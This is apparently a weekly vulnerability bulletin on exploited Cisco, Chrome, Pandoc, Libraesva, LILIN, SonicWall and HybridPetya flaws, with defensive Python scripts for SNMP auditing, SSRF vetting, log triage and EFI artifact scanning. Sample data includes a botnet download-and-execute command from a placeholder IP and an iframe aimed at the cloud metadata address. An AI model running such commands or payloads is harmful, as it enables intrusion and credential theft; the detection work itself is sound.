Executive Summary
This week underscored the growing risk from zero-day exploitation, with multiple high-impact vulnerabilities confirmed under active attack. CISA added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog (two in Cisco software and one in Google Chrome), all confirmed as zero-days. Beyond these, Libraesva confirmed targeted exploitation of a critical flaw in its Email Security Gateway, while researchers observed ongoing abuse of a Server-Side Request Forgery vulnerability in the Linux utility JGM Pandoc. Cisco’s IOS XE Software was also confirmed to be under active attack, underscoring the persistent focus of adversaries on enterprise-critical infrastructure.
Botnet activity has seen a sharp escalation, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st actively exploiting vulnerabilities in GitLab, cloud gateways, and PHP-based applications. Meanwhile, IoT-centric botnets such as Mirai, Bashlite, Tsunami, and BrickerBot are ramping up their campaigns, specifically targeting EirD1000 routers to gain persistence and facilitate lateral movement across networks.
ESET researchers have reported HybridPetya, a Petya/NotPetya-inspired ransomware that continues the evolution of earlier strains by leveraging a vulnerability to compromise UEFI-based systems. Threat activity also persists, with attackers exploiting a flaw in LILIN DVRs to spread botnets like Chalubo, FBot, and Moobot. In addition, the ongoing exploitation of a SonicWall vulnerability remains a concern, as it has been directly linked to Akira ransomware intrusions targeting Australian organizations.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed decisions.
CVE-2025-10585
A Type Confusion Vulnerability has been identified in the V8 JavaScript and WebAssembly engine, posing a serious security risk. Successful exploitation of this flaw could enable a remote attacker to bypass the browser’s security sandbox by luring users into visiting a specially crafted malicious webpage. Google has addressed the issue by releasing a new stable channel update, version 140.0.7339.185/.186 for Windows and Mac and 140.0.7339.185 for Linux. While Google has acknowledged that this vulnerability has been exploited as a zero-day in the wild, it has not disclosed any details regarding active campaigns linked to the attacks. The vulnerability has also been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.
CVE-2025-20333
A Buffer Overflow vulnerability has been discovered in the Cisco Secure Firewall Adaptive Security Appliance (ASA) and Secure Firewall Threat Defense (FTD) Software VPN Web Server. The issue arises from improper validation of user-supplied input in HTTP(S) requests and could allow remote attackers with valid VPN credentials to execute arbitrary code as root, potentially leading to complete device compromise. Cisco’s Product Security Incident Response Team (PSIRT) confirmed that the flaw is already being exploited in the wild and cautioned that it may be chained with CVE-2025-20362 for increased impact. Both vulnerabilities have been added to the CISA KEV catalog, and Cisco strongly urges customers to upgrade to a fixed software release to mitigate the risk.
CVE-2025-20352
A Denial of Service and Remote Code Execution Vulnerability has been identified in Cisco IOS and IOS XE software, caused by a stack overflow condition in the SNMP subsystem. Exploitation could allow a low-privileged attacker to force a system reload, resulting in a DoS, or enable a high-privileged attacker to execute arbitrary code as the root user, gaining full control of the device. This high-severity vulnerability affects all versions of SNMP, and while Cisco has released software updates and mitigation guidance, no direct workarounds exist. Cisco PSIRT has confirmed active exploitation in the wild, where attackers leveraged compromised local Administrator credentials to target vulnerable systems.
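Because the low-privilege path to a device reload only needs a community string or SNMPv3 user that the device accepts, the practical exposure on an unpatched box is governed by who can reach SNMP and at what credential level. The following is an added example (not Cisco's tooling and not a workaround for CVE-2025-20352; upgrading remains the fix) that audits an IOS-style configuration excerpt for communities with no source access-list, default community names, read-write communities and SNMPv3 groups below the priv level. The configuration text is constructed for the example and access-list 10 is a placeholder.

```python
"""Audit an IOS/IOS XE running-config excerpt for SNMP exposure.

Added example, not Cisco's tooling. Patching fixes CVE-2025-20352; this
only highlights configuration that lets more sources, or weaker credential
levels, reach the SNMP subsystem than necessary. The config text below is
constructed; access-list 10 is a placeholder.
"""
import re

# Community strings that ship as defaults and are guessed first.
DEFAULT_COMMUNITIES = {"public", "private"}

# snmp-server community <string> [view <name>] RO|RW [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)(?: view \S+)? (?P<mode>RO|RW)(?: (?P<acl>\S+))?$",
    re.IGNORECASE,
)
# snmp-server group <name> v3 noauth|auth|priv ...
GROUP_RE = re.compile(
    r"^snmp-server group (?P<name>\S+) v3 (?P<level>noauth|auth|priv)\b",
    re.IGNORECASE,
)

# Constructed sample configuration, not taken from any real device.
SAMPLE_CONFIG = """\
snmp-server community public RO
snmp-server community ops-ro RO 10
snmp-server community private RW
snmp-server group NETMON v3 priv
snmp-server group LEGACY v3 noauth
access-list 10 permit 10.10.0.5
"""


def audit_snmp_config(config_text: str) -> list:
    """Return (rule, subject) findings, one per risky SNMP setting."""
    findings = []
    for raw in config_text.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            name = m.group("name")
            mode = m.group("mode").upper()
            acl = m.group("acl")
            if name.lower() in DEFAULT_COMMUNITIES:
                findings.append(("default-community-name", name))
            if acl is None:
                # No access-list: any host that reaches UDP/161 can try the string.
                findings.append(("community-without-acl", name))
            if mode == "RW":
                # Write access is the high-privilege case described above.
                findings.append(("rw-community", name))
            continue
        m = GROUP_RE.match(line)
        if m and m.group("level").lower() != "priv":
            # noauth/auth groups accept weaker credentials than priv.
            findings.append(("v3-group-without-priv", m.group("name")))
    return findings


if __name__ == "__main__":
    for rule, subject in audit_snmp_config(SAMPLE_CONFIG):
        print(f"{rule}: {subject}")
```

Run it against `show running-config | include snmp-server` output; every finding is a line to tighten (add a source ACL, drop default names, move v3 groups to priv) while the upgrade is scheduled.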
CVE-2025-20362
A Missing Authorization vulnerability has been identified in the Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software VPN Web Server. The flaw arises from improper validation of user-supplied input in HTTP(S) requests and could allow an unauthenticated, remote attacker to access restricted URL endpoints without proper authentication. By sending crafted HTTP requests, attackers may exploit this weakness to bypass security controls. Cisco’s Product Security Incident Response Team (PSIRT) has confirmed that the flaw is already being actively targeted and warned that it could be chained with CVE-2025-20333 for greater impact. Both vulnerabilities have also been added to the CISA KEV catalog, and Cisco continues to strongly recommend that customers upgrade to a fixed software release to ensure remediation.
CVE-2025-51591
A Server-Side Request Forgery (SSRF) Vulnerability has been identified in the Linux utility JGM Pandoc, allowing attackers to inject a crafted iframe and potentially compromise entire cloud infrastructures. Security firm Wiz reported that the flaw has been exploited in the wild to target Amazon Web Services (AWS) Instance Metadata Service (IMDS), particularly EC2 instances relying on the older IMDSv1, which exposes sensitive metadata and temporary credentials. Pandoc maintainers confirmed that iframe rendering is intended behavior, placing responsibility on users to sanitize input or apply options such as “-f html+raw_html” or “--sandbox” to block malicious iframe content. To mitigate risks, organizations are advised to enforce IMDSv2, apply the principle of least privilege (PoLP) for IAM roles, and patch vulnerable third-party software to reduce exposure.
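Since the maintainers treat iframe rendering as intended, the input-sanitization side of the mitigation falls on whoever feeds untrusted documents to pandoc. The following is an added example (not Pandoc's own code and not Wiz's tooling) that vets a document before conversion: it parses the raw HTML and rejects any fetching element (iframe, img, object, embed, script, link) whose target is a literal address in the link-local range that IMDS lives in (169.254.169.254) or the AWS IMDS IPv6 endpoint fd00:ec2::254. Hostnames that resolve to those addresses are out of scope, and the sample document is constructed.

```python
"""Vet a Markdown/HTML document for raw HTML that would make a converter
fetch the cloud metadata service (SSRF) before it is handed to pandoc.

Added example, not Pandoc's code and not Wiz's tooling. Assumes the input
format allows raw HTML and checks only literal IP targets; DNS names that
resolve to the metadata address are not covered.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements whose referenced resource a converter may fetch while rendering.
FETCHING_ATTRS = {
    "iframe": "src",
    "img": "src",
    "embed": "src",
    "script": "src",
    "object": "data",
    "link": "href",
}

METADATA_RANGES = (
    ipaddress.ip_network("169.254.0.0/16"),     # IPv4 link-local, holds 169.254.169.254
    ipaddress.ip_network("fd00:ec2::254/128"),  # AWS IMDS IPv6 endpoint
)


def is_metadata_target(url: str) -> bool:
    """True when the URL's host is a literal IP inside a metadata range."""
    host = urlsplit(url.strip()).hostname
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not a literal address
    return any(addr in net for net in METADATA_RANGES)


class _MetadataFetchFinder(HTMLParser):
    """Collect (tag, url) pairs for fetching elements aimed at metadata."""

    def __init__(self) -> None:
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        wanted = FETCHING_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value and is_metadata_target(value):
                self.hits.append((tag, value))


def find_metadata_fetches(document: str) -> list:
    """Return every raw-HTML fetch in the document that targets IMDS."""
    finder = _MetadataFetchFinder()
    finder.feed(document)
    finder.close()
    return finder.hits


def safe_to_convert(document: str) -> bool:
    """Policy: refuse conversion when any metadata-targeting element is present."""
    return not find_metadata_fetches(document)


# Constructed sample input, not a captured exploit document.
SAMPLE_DOC = """# Quarterly report

<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>

<img src="https://example.com/logo.png" alt="logo">
"""

if __name__ == "__main__":
    for tag, url in find_metadata_fetches(SAMPLE_DOC):
        print(f"blocked <{tag}> -> {url}")
    print("safe to convert:", safe_to_convert(SAMPLE_DOC))
```

This check complements rather than replaces the page's other advice: run pandoc with `--sandbox` for untrusted input, and require IMDSv2 on the instance so a forged request without a session token gets nothing back.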
CVE-2025-59689
A Command Injection Vulnerability via a compressed email attachment in the Libraesva Email Security Gateway (ESG) allows attackers to execute arbitrary shell commands. This flaw stems from improper sanitization of files within certain archive formats, enabling attackers to bypass input validation and inject commands. The issue affects versions 4.5 through 5.5.x prior to 5.5.7. Successful exploitation allows execution of shell commands under a non-privileged account, which could then be leveraged for persistence, lateral movement, or privilege escalation. Libraesva confirmed that this vulnerability has already been abused in one targeted incident, likely conducted by a foreign hostile state, with the attack focusing on a single appliance rather than a broad-scale financial crime campaign.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section identifies vulnerabilities exploited by botnets, including recent CVEs logged in MISP, and presents the top 5 CVEs with payloads suggestive of botnet activity, such as the use of wget with raw IP addresses.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2025-34130
360Netlab reported that since August 2019, its unknown threat detection system has observed multiple groups exploiting a zero-day vulnerability in LILIN DVRs to distribute botnets such as Chalubo, FBot, and Moobot. The exploited vulnerability is an arbitrary file read issue in /z/zbin/net_html.cgi. In February 2020, the manufacturer addressed the issue and released the firmware program 2.0b60_20200207 to patch the vulnerabilities. These findings underscore how unpatched or poorly secured IoT devices can become a persistent attack vector, fueling botnet operations for years.
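Two of the observations above translate directly into log triage: the sensor section's botnet signature (payloads that pull a second stage with wget from a bare IP address) and the LILIN DVR endpoint /z/zbin/net_html.cgi named in the 360Netlab report. The following is an added example (not Loginsoft's sensor pipeline and not 360Netlab's detection system) that runs both rules over constructed web-server log lines, URL-decoding each line first because payloads are often percent-encoded; the rule names are this example's own.

```python
"""Triage web-server access-log lines for two patterns from the report:
requests to the LILIN DVR endpoint /z/zbin/net_html.cgi, and commands that
fetch a second stage with wget/curl/tftp from a dotted-quad IP address.

Added example, not Loginsoft's or 360Netlab's tooling. The log lines are
constructed; the rule names are this example's own.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Common/combined log format: source, identd, user, [timestamp], "request"
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
LILIN_PATH = "/z/zbin/net_html.cgi"
# A downloader command followed, within the same shell command, by a bare IPv4.
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b[^;|&]*?\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample log lines, not sensor data from the report.
SAMPLE_LOGS = [
    '203.0.113.10 - - [24/Sep/2025:10:01:02 +0000] "GET /z/zbin/net_html.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Sep/2025:10:01:05 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 200 43 "-" "cd /tmp; wget http://198.51.100.99/bins/x86; chmod +x x86; ./x86"',
    '192.0.2.5 - - [24/Sep/2025:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def classify(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (source_ip, matched_rules) for a parseable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(line)  # match on the decoded form of the whole line
    tags = []
    if LILIN_PATH in decoded:
        tags.append("lilin-net_html-cgi")
    if DOWNLOADER_RE.search(decoded):
        tags.append("downloader-with-raw-ip")
    return m.group("src"), tags


def triage(lines) -> List[Tuple[str, List[str]]]:
    """Keep only lines that matched at least one rule."""
    hits = []
    for line in lines:
        result = classify(line)
        if result and result[1]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for src, tags in triage(SAMPLE_LOGS):
        print(f"{src}: {', '.join(tags)}")
```

Sources that trip the downloader rule are candidates for blocking and for pivoting on the fetched IP; hits on the LILIN path from anything other than a management host indicate a DVR still exposed years after the 2020 firmware fix.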
CVE-2024-40766
The Australian Cyber Security Centre (ACSC) has issued an alert regarding the active exploitation of CVE-2024-40766, a critical vulnerability in SonicWall SSL VPNs that has been directly linked to Akira ransomware intrusions against Australian organizations. The flaw affects Gen 5, Gen 6, and Gen 7 SonicWall devices running vulnerable SonicOS versions, and successful exploitation can grant attackers unauthorized access to corporate networks or even crash the firewall, escalating the impact. According to the ACSC, threat actors are actively leveraging this weakness, with Akira ransomware groups increasingly using VPN vulnerabilities as entry points. Considering this, the agency is urging all organizations to immediately patch their devices, stressing that the latest security builds are available for download via mysonicwall.com.
CVE-2024-7344
ESET researchers uncovered HybridPetya on VirusTotal, a Petya/NotPetya-style ransomware that extends those tactics to UEFI-based systems by weaponizing CVE-2024-7344, the vulnerable Howyar reloader.efi loader. On unpatched machines the malware's installer drops a bootkit into the EFI System Partition that includes a modified bootloader, a fallback loader, config/validation files, an exploit payload container (often delivered as an XOR-obfuscated cloak.dat), and a status file; the bootkit uses a three-state flag (0 = ready, 1 = encrypted, 2 = decrypted after ransom) and a \EFI\Microsoft\Boot\counter file to track encrypted clusters. Its core routine encrypts the NTFS Master File Table (MFT) with Salsa20 while displaying a fake CHKDSK message to hide activity. Victims receive a ransom demand (US$1,000 in Bitcoin) and can enter a purchased key to trigger staged decryption and restoration of backed-up bootloaders; unlike NotPetya, HybridPetya can reconstruct decryption keys from installation artifacts. Some variants exploit the insecure loading behavior of reloader.efi (renamed as bootmgfw.efi) to bypass Secure Boot, a deficiency Microsoft addressed by revoking the vulnerable binaries in its January 2025 update.
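The artifacts ESET names give an incident responder something concrete to look for on a mounted EFI System Partition: a cloak.dat payload container, the \EFI\Microsoft\Boot\counter progress file, and a bootmgfw.efi that is not the vendor's (the renamed vulnerable reloader.efi). The following is an added example (not ESET's tooling) that scans an ESP for those three indicators, comparing bootmgfw.efi against a SHA-256 allowlist of known-good loaders. The allowlist and file bytes are constructed placeholders, and the scan assumes the ESP is mounted read-only.

```python
"""Inspect an EFI System Partition for the HybridPetya artifacts ESET
describes: cloak.dat, EFI/Microsoft/Boot/counter, and a bootmgfw.efi whose
SHA-256 is not on a vendor allowlist (the renamed vulnerable reloader.efi).

Added example, not ESET's tooling. Assumes the ESP is mounted read-only
and that you supply hashes of your own known-good bootmgfw.efi; the
allowlist and file contents below are constructed placeholders.
"""
import hashlib
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

COUNTER_PATH = "efi/microsoft/boot/counter"   # compared case-insensitively
PAYLOAD_CONTAINER = "cloak.dat"
BOOTLOADER_NAME = "bootmgfw.efi"


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_entries(entries: Dict[str, bytes], bootloader_allowlist: Iterable[str]) -> List[Tuple[str, str]]:
    """entries maps ESP-relative paths (forward slashes) to file contents."""
    allow = set(bootloader_allowlist)
    findings = []
    for rel, data in sorted(entries.items()):
        low = rel.lower()
        name = low.rsplit("/", 1)[-1]
        if name == PAYLOAD_CONTAINER:
            findings.append(("payload-container", rel))
        if low == COUNTER_PATH:
            findings.append(("encryption-counter", rel))
        if name == BOOTLOADER_NAME and sha256_bytes(data) not in allow:
            # Any bootmgfw.efi not matching a vendor hash needs a closer look.
            findings.append(("unknown-bootmgfw", rel))
    return findings


def scan_esp(mount_point: str, bootloader_allowlist: Iterable[str]) -> List[Tuple[str, str]]:
    """Walk a mounted ESP (small by design) and run scan_entries over its files."""
    root = Path(mount_point)
    entries = {
        p.relative_to(root).as_posix(): p.read_bytes()
        for p in root.rglob("*")
        if p.is_file()
    }
    return scan_entries(entries, bootloader_allowlist)


# Constructed stand-ins; real use hashes the vendor's signed bootmgfw.efi.
GOOD_LOADER = b"constructed stand-in for the vendor bootmgfw.efi"
ALLOWLIST = {sha256_bytes(GOOD_LOADER)}
SAMPLE_ESP = {
    "EFI/Microsoft/Boot/bootmgfw.efi": b"constructed stand-in for a swapped-in loader",
    "EFI/Microsoft/Boot/cloak.dat": b"\x00" * 16,
    "EFI/Microsoft/Boot/counter": b"\x00\x00\x00\x00",
    "EFI/Boot/bootx64.efi": GOOD_LOADER,
}

if __name__ == "__main__":
    for rule, path in scan_entries(SAMPLE_ESP, ALLOWLIST):
        print(f"{rule}: {path}")
```

On a live system, pair the hash check with the January 2025 Secure Boot revocations: a bootmgfw.efi that fails the allowlist on a machine that has not applied the DBX update is exactly the case the variant above abuses.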
PRE-NVD observed for this week
This section covers vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2025/09/25/cisa-directs-federal-agencies-identify-and-mitigate-potential-compromise-cisco-devices
- https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_17.html
- https://docs.libraesva.com/knowledgebase/security-advisory-command-injection-vulnerability-cve-2025-59689/
- https://securityonline.info/cve-2025-59689-libraesva-esg-command-injection-flaw-exploited-in-the-wild/
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte